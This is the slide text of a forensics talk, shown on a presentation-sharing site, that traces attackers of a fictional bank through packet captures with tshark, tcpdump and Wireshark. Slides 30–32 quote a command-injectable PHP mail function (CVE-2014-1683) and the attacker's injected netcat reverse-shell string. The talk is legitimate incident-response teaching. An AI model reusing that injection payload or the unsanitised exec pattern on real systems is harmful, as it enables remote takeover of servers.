breaking the bank tracing defacers through a company
play

Breaking the bank Tracing defacers through a company network Judith - PowerPoint PPT Presentation

Dec 01, 2022 •377 likes •782 views

Breaking the bank Tracing defacers through a company network Judith van Stegeren After my graduation After my graduation Where I work Where I work What I do Demo Incident Response for fictional bank Zone-H: defacement registry Defacement

  1. Breaking the bank Tracing defacers through a company network Judith van Stegeren

  2. After my graduation

  3. After my graduation

  4. Where I work

  5. Where I work

  6. What I do

  7. Demo

  8. Incident Response for fictional bank

  9. Zone-H: defacement registry

  10. Defacement

  11. Snort $ ls 2015-07-19 2015-07-20 2015-07-21 2015-07-22 2015-07-23 2015-07-24 $ cd 2015-07-23 $ ls snort.log.1437609637 snort.log.1437656593 snort.log.1437692410

  12. Finding the right log $ ls snort.log.1437609637 snort.log.1437656593 snort.log.1437692410 $ capinfos -a * File name: snort.log.1437609637 First packet time: 2015-07-23 02:11:16.403393 File name: snort.log.1437656593 First packet time: 2015-07-23 15:03:13.956770 File name: snort.log.1437692410 First packet time: 2015-07-24 01:00:10.028476

  13. Wireshark!

  14. Wireshark!

  15. Wireshark!

  16. User Agent “In computing, a user agent is software (a software agent) that is acting on behalf of a user.” (Wikipedia) Examples: "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "Hetzner System Monitoring" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:40.0) Gecko/20100101 Firefox/40.0" "Tiny Tiny RSS/16.8 (3d5d289) (http://tt-rss.org/)" "Tiny Tiny RSS/17.1 (78fee22) (http://tt-rss.org/)" "Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)"

  17. Obtaining a list of User Agents with tshark $ tshark -Y "ip.src == 82.145.37.203 and http.request" -r snort.log.1437656593 -T fields -e http.user_agent | sort | uniq -c | sort -nr | head

  18. Obtaining a list of User Agents with tshark $ tshark -Y "ip.src == 82.145.37.203 and http.request" -r snort.log.1437656593 -T fields -e http.user_agent | sort | uniq -c | sort -nr | head 452 w3af.org 415 Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:map_codes) 290 Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:sitezip) 79 Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.5.0 42 Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:cgi dir check) 32 Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:multiple_index) 32 Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:embedded detection) 12 Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:headers: Translate-f #1) 12 Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:001398) 12 Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:001397)

  19. Obtaining a list of requests with tshark $ tshark -Y "ip.src == 82.145.37.203 and http.request and http.user_agent contains Firefox" -r snort.log.1437656593 -T fields -e http.request.method -e http.host -e http.request.uri | sort | uniq -c | sort -nr

  20. Obtaining a list of requests with tshark $ tshark -Y "ip.src == 82.145.37.203 and http.request and http.user_agent contains Firefox" -r snort.log.1437656593 -T fields -e http.request.method -e http.host -e http.request.uri | sort | uniq -c | sort -nr 9 GET www.mcduckbank.net / 8 GET www.mcduckbank.net /data/media/portfolio/mcduck_on_money.jpg 5 GET www.mcduckbank.net /admin.php?mgr=login&js=1 4 POST www.mcduckbank.net /index.php?pid=4 4 GET www.mcduckbank.net /ui/elements/css/elements.css 4 GET www.mcduckbank.net /ui/admin/js/scripts.js 4 GET www.mcduckbank.net /ui/admin/js/jquery.js 4 GET www.mcduckbank.net /ui/admin/js/imagehover.js 4 GET www.mcduckbank.net /ui/admin/images/bg.clouds.mgr.png 4 GET www.mcduckbank.net /ui/admin/css/tabs.css 4 GET www.mcduckbank.net /ui/admin/css/ssm.type.css 4 GET www.mcduckbank.net /ui/admin/css/ssm.tables.css 4 GET www.mcduckbank.net /ui/admin/css/ssm.master.css 4 GET www.mcduckbank.net /index.php?pid=4 3 POST www.mcduckbank.net /admin.php?mgr=login&js=1&try=1 2 GET www.mcduckbank.net /ui/elements/images/icon.error.gif 2 GET www.mcduckbank.net /favicon.ico 2 GET www.mcduckbank.net /admin.php?en_log_id=0&action=users 2 GET www.mcduckbank.net /admin.php 1 GET www.mcduckbank.net /ui/admin/images/bg.login.png 1 GET www.mcduckbank.net /bb.jpg

  21. Intermezzo: dealing with unwieldy PCAP files

  22. Intermezzo: dealing with unwieldy PCAP files $ ls -lsh -rw-r--r-- 1 judith judith 154M Jul 23 2015 snort.log.1437609637 -rw-r--r-- 1 judith judith 155M Jul 24 2015 snort.log.1437656593 -rw-r--r-- 1 judith judith 264K Jul 24 2015 snort.log.1437692410

  23. Intermezzo: dealing with unwieldy PCAP files Let’s filter on attacker IP $ tcpdump -r snort.log.1437656593 -w attacker.pcap host 82.145.37.203

  24. Intermezzo: dealing with unwieldy PCAP files Let’s filter on attacker IP $ tcpdump -r snort.log.1437656593 -w attacker.pcap host 82.145.37.203 And then filter out only packages from after 17:00 $ editcap -A "2015-07-23 17:00:00" -F pcap attacker.pcap attacker_after_17.pcap

  25. Intermezzo: dealing with unwieldy PCAP files $ ls -lsh total 320M 440K -rw-r--r-- 1 judith judith 439K Apr 11 16:21 attacker_after_17.pcap 10M -rw-r--r-- 1 judith judith 10M Apr 11 16:14 attacker.pcap 154M -rw-r--r-- 1 judith judith 154M Jul 23 2015 snort.log.1437609637 155M -rw-r--r-- 1 judith judith 155M Jul 24 2015 snort.log.1437656593 264K -rw-r--r-- 1 judith judith 264K Jul 24 2015 snort.log.1437692410

  26. Small PCAP

  27. Attack 1

  28. Attack 2

  29. Contactform

  30. Underlying PHP code function bashMail($sbj, $msg, $to, $cc=’’, $bc=’’) { $cmd = ’echo "’.$msg.’" | mail -s "’.$sbj.’" ’.$to; exec($cmd, $err); $res = count($err) == 0 ? 1 : 4 ; return $res; }

  31. Underlying PHP code function bashMail($sbj, $msg, $to, $cc=’’, $bc=’’) { $cmd = ’echo "’.$msg.’" | mail -s "’.$sbj.’" ’.$to; exec($cmd, $err); $res = count($err) == 0 ? 1 : 4 ; return $res; } CVE-2014-1683 “It is possible to exploit this vulnerability because the POST parameters name , email , subject , and message are not properly sanitized when submitted to the contactform page. Arbitrary commands can be executed by injecting the payload to a vulnerable parameter.” source: http://seclists.org/fulldisclosure/2014/Jan/159

  32. Command injection results Input sent by attacker: escape"; /bin/nc.traditional -e /bin/sh [attacker ip] 37226; echo " Resulting PHP code: exec(’echo "escape"; /bin/nc.traditional -e /bin/sh [attacker ip] 37226; echo "" | mail -s "’.$sbj.’" ’.$to, $err);

  33. Customer data

  34. Attacker shell

  35. Attacker shell

  36. Summary 1. Automated website scans W3G/Nikto 2. Manual attacks via Firefox/IceWeasel 3. Brute-force attacks on administrator panel 4. Command injection attack via contact form 5. Upload new index and image via netcat Credits PCAP and defacement scenario by Erik Hjelmvik, NETRESEC (SE)

  37. Asymmetric relation attack vs defense

  38. Further reading Career advice ◮ www.cyberdomein.nl , “Carriere” ◮ www.jvns.ca , “How to be a wizard programmer” and all other comics by Julia Evans Practice your infosec skills ◮ www.certifiedsecure.com , online challenges, mostly web-security. ◮ www.microcorruption.com , assembly-focused (virtual) hardware hacking ◮ www.cryptopals.com , learn to implement and break crypto ◮ www.crimediggers.nl , digital forensics challenge by the Dutch police

  39. Questions?

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

Advanced Ray Tracing 1 2/8/2006 Distributed Ray Tracing Distributed ray tracing is an

Advanced Ray Tracing 1 2/8/2006 Distributed Ray Tracing Distributed ray tracing is an

Advanced Ray Tracing 1 2/8/2006 Distributed Ray Tracing Distributed ray tracing is an elegant technique that tackles many problems at once Stochastic ray tracing: distribute rays stochastically across pixel Distributed ray tracing:

327 views • 8 slides
MIT 6.837 - Ray Tracing Ray Tracing MIT EECS 6.837 Most slides are taken from Frdo Durand and

MIT 6.837 - Ray Tracing Ray Tracing MIT EECS 6.837 Most slides are taken from Frdo Durand and

MIT 6.837 - Ray Tracing Ray Tracing MIT EECS 6.837 Most slides are taken from Frdo Durand and Barb Cutler Some slides courtesy of Leonard McMillan 1 2 Ray Tracing Ray Tracing Ray Tracing kills two birds with one stone: Solves the

327 views • 11 slides
BU BUILD YOUR R OWN PR DISTRIBUTION MACHINE WI WITHOUT BR BREAKING THE BA BANK usfarmdata.com

BU BUILD YOUR R OWN PR DISTRIBUTION MACHINE WI WITHOUT BR BREAKING THE BA BANK usfarmdata.com

BU BUILD YOUR R OWN PR DISTRIBUTION MACHINE WI WITHOUT BR BREAKING THE BA BANK usfarmdata.com | 2 Million database of US Farmers & Ranchers TODAY Goal: Get in Front of our Audience Types of press releases Targeting distribution

511 views • 21 slides
Become a Progressive No Kill Community without Breaking the Bank Presented by:

Become a Progressive No Kill Community without Breaking the Bank Presented by:

Become a Progressive No Kill Community without Breaking the Bank Presented by: Hillsborough County Pet Resources & The Humane Society of Tampa Bay Sponsored by: Best Friends Animal Society, Inc. Paradigm Shift in Public Sheltering

454 views • 16 slides
Ray Tracing 1 Ray Tracing Ray Tracing kills two birds with one stone: Solves the Hidden

Ray Tracing 1 Ray Tracing Ray Tracing kills two birds with one stone: Solves the Hidden

Ray Tracing 1 Ray Tracing Ray Tracing kills two birds with one stone: Solves the Hidden Surface Removal problem Evaluates an improved global illumination model shadows ideal specular reflections ideal specular refractions

586 views • 19 slides
Introduction to Path Tracing Marc Sunet Table of contents From Ray Tracing to Path Tracing The

Introduction to Path Tracing Marc Sunet Table of contents From Ray Tracing to Path Tracing The

Introduction to Path Tracing Marc Sunet Table of contents From Ray Tracing to Path Tracing The Rendering Equation Monte Carlo Integration A Basic Path Tracer Variance Reduction and Optimisation Techniques Additional Resources Plan From Ray

1.08k views • 54 slides
Computer Graphics - Ray-Tracing II - Hendrik Lensch Computer Graphics WS07/08 Ray Tracing II

Computer Graphics - Ray-Tracing II - Hendrik Lensch Computer Graphics WS07/08 Ray Tracing II

Computer Graphics - Ray-Tracing II - Hendrik Lensch Computer Graphics WS07/08 Ray Tracing II Overview Last lecture Ray tracing I Basic ray tracing What is possible? Recursive ray tracing algorithm Intersection

873 views • 84 slides
Ray-tracing Acceleration Motivation Distribution Ray Tracing Soft shadows

Ray-tracing Acceleration Motivation Distribution Ray Tracing Soft shadows

Ray-tracing Acceleration Motivation Distribution Ray Tracing Soft shadows Acceleration Data Structures Antialiasing (getting rid of jaggies) for Ray Tracing Glossy reflection Motion blur Depth of field (focus)

940 views • 10 slides
Welcome 1 Ray tracing part I of the course 2 Ray tracing part I of the course Why

Welcome 1 Ray tracing part I of the course 2 Ray tracing part I of the course Why

Graphics (INFOGR), 2018-19, Block IV, lecture 1 Deb Panja Today: Vectors and vector algebra Welcome 1 Ray tracing part I of the course 2 Ray tracing part I of the course Why vectors? you need to shoot a lot of such rays!

594 views • 47 slides
Pros and Cons of Bank Holding Companies: Determining Whether a Bank Holding Company Structure

Pros and Cons of Bank Holding Companies: Determining Whether a Bank Holding Company Structure

Presenting a live 90-minute webinar with interactive Q&A Pros and Cons of Bank Holding Companies: Determining Whether a Bank Holding Company Structure Makes Sense for Your Bank THURSDAY, OCTOBER 12, 2017 1pm Eastern | 12pm Central |

667 views • 55 slides
Ray Tracing Basics CSE 681 Autumn 11 Han-Wei Shen Forward Ray Tracing We shoot a large

Ray Tracing Basics CSE 681 Autumn 11 Han-Wei Shen Forward Ray Tracing We shoot a large

Ray Tracing Basics CSE 681 Autumn 11 Han-Wei Shen Forward Ray Tracing We shoot a large number of photons Problem? Backward Tracing For every pixel Construct a ray from the eye For every object in the scene Find intersection with the ray

695 views • 55 slides
July 1, 2009 Company Name: Aozora Bank, Ltd. (Code: 8304, TSE First Section) Company Name:

July 1, 2009 Company Name: Aozora Bank, Ltd. (Code: 8304, TSE First Section) Company Name:

July 1, 2009 Company Name: Aozora Bank, Ltd. (Code: 8304, TSE First Section) Company Name: Shinsei Bank, Limited (Code: 8303, TSE First Section) Aozora Bank, Ltd. and Shinsei Bank, Limited Announce Agreement to Merge - Creation of a Japanese

158 views • 12 slides
Knowledge Tracing Machines: Factorization Machines for Knowledge Tracing Jill-Jnn Vie Hisashi

Knowledge Tracing Machines: Factorization Machines for Knowledge Tracing Jill-Jnn Vie Hisashi

Introduction Knowledge Tracing Encoding existing models Knowledge Tracing Machines Results Conclusion Knowledge Tracing Machines: Factorization Machines for Knowledge Tracing Jill-Jnn Vie Hisashi Kashima KJMLW, February 22, 2019

698 views • 51 slides
2002 State Member Bank / Bank Holding Company Regulatory Reporting Update Meredith Miske Rich

2002 State Member Bank / Bank Holding Company Regulatory Reporting Update Meredith Miske Rich

2002 State Member Bank / Bank Holding Company Regulatory Reporting Update Meredith Miske Rich Molloy Monica Posen Mike Tursi Federal Reserve Bank of New York April 1, 2002 1 2002 State Member Bank / Bank Holding Company Regulatory

1.03k views • 102 slides
Breaking New Ground Bank of America Global Metals, Mining and Steel Conference May 2020

Breaking New Ground Bank of America Global Metals, Mining and Steel Conference May 2020

Breaking New Ground Bank of America Global Metals, Mining and Steel Conference May 2020 Klada , Turkey Forward Looking Statement Non-IFRS Measures Certain non-IFRS measures are included in this presentation, including average realized

178 views • 14 slides
Breaking out of the box Understanding rela5onships between learning and assessment Breaking

Breaking out of the box Understanding rela5onships between learning and assessment Breaking

Dr Nick Saville Breaking out of the box Understanding rela5onships between learning and assessment Breaking out of the box - a metaphor for thinking about rela5onships and interpreta5ons breaking out breaking out of the box of the

895 views • 68 slides
Regular Expression Matching on Graphics Hardware for Intrusion Detection Giorgos Vasiliadis,

Regular Expression Matching on Graphics Hardware for Intrusion Detection Giorgos Vasiliadis,

Regular Expression Matching on Graphics Hardware for Intrusion Detection Giorgos Vasiliadis, Michalis Polychronakis, Spiros Antonatos, Sotiris Ioannidis, Evangelos P. Markatos FORTH-ICS, Greece RAID09, 25 September 2009

225 views • 19 slides
Chapter 5: Algorithms and Heuristics CS105: Great Insights in Computer Science Song Growth

Chapter 5: Algorithms and Heuristics CS105: Great Insights in Computer Science Song Growth

Chapter 5: Algorithms and Heuristics CS105: Great Insights in Computer Science Song Growth Lets talk about how many syllables we sing given a song of a certain type as the number of verses grows. In general, were interested in

836 views • 65 slides
Detecting Attacks Anomaly-based Detection Signature-based Signature-based (Misuse)

Detecting Attacks Anomaly-based Detection Signature-based Signature-based (Misuse)

Detecting Attacks Anomaly-based Detection Signature-based Signature-based (Misuse) Detection Intrusion Detection Host-based Network-based Boriana Ditcheva and Lisa Fowler Active/Passive University of North Carolina at

401 views • 12 slides
Net work Management Tasks Prot ect ing t he net work (e.g. int rusion 17: det ect ion) Net

Net work Management Tasks Prot ect ing t he net work (e.g. int rusion 17: det ect ion) Net

Net work Management Tasks Prot ect ing t he net work (e.g. int rusion 17: det ect ion) Net work Management and Det ect ing f ailed component s (int erf aces, links, host s, rout ers) Monit oring Monit oring t raf f ic pat t erns

219 views • 8 slides
Packet Analysis By Brian Brown NetSec Syllabus: https://ubnetdef.org/courses/netsec/ - Ran by:

Packet Analysis By Brian Brown NetSec Syllabus: https://ubnetdef.org/courses/netsec/ - Ran by:

Packet Analysis By Brian Brown NetSec Syllabus: https://ubnetdef.org/courses/netsec/ - Ran by: Chris Crawford (DoD) - @zachtenenbaum and @srini are TAs What is Packet Analysis? - Packet Analysis is the capture and interpretation of the

814 views • 22 slides
S-NFV: Securing NFV states by using SGX Ming-Wei Shih Mohan Kumar Taesoo Kim Ada

S-NFV: Securing NFV states by using SGX Ming-Wei Shih Mohan Kumar Taesoo Kim Ada

S-NFV: Securing NFV states by using SGX Ming-Wei Shih Mohan Kumar Taesoo Kim Ada Gavrilovska Georgia Institute of Technology Network Function Virtualization (NFV) Virtualized Network Functions (VNFs) NAT IDS Web Caching VNF NF OS

542 views • 16 slides
Opportunistic IPv6 Insight via Abusive Traffic Robert Beverly, Geoffrey Xie Naval Postgraduate

Opportunistic IPv6 Insight via Abusive Traffic Robert Beverly, Geoffrey Xie Naval Postgraduate

Opportunistic IPv6 Insight via Abusive Traffic Robert Beverly, Geoffrey Xie Naval Postgraduate School {rbeverly,xie}@nps.edu February 8, 2012 CAIDA Workshop on Active Internet Measurements R. Beverly et al. (NPS) Opportunistic IPv6 Insight

568 views • 34 slides
t rt sr P

t rt sr P

r t rst Pr t r tr

653 views • 27 slides

More recommend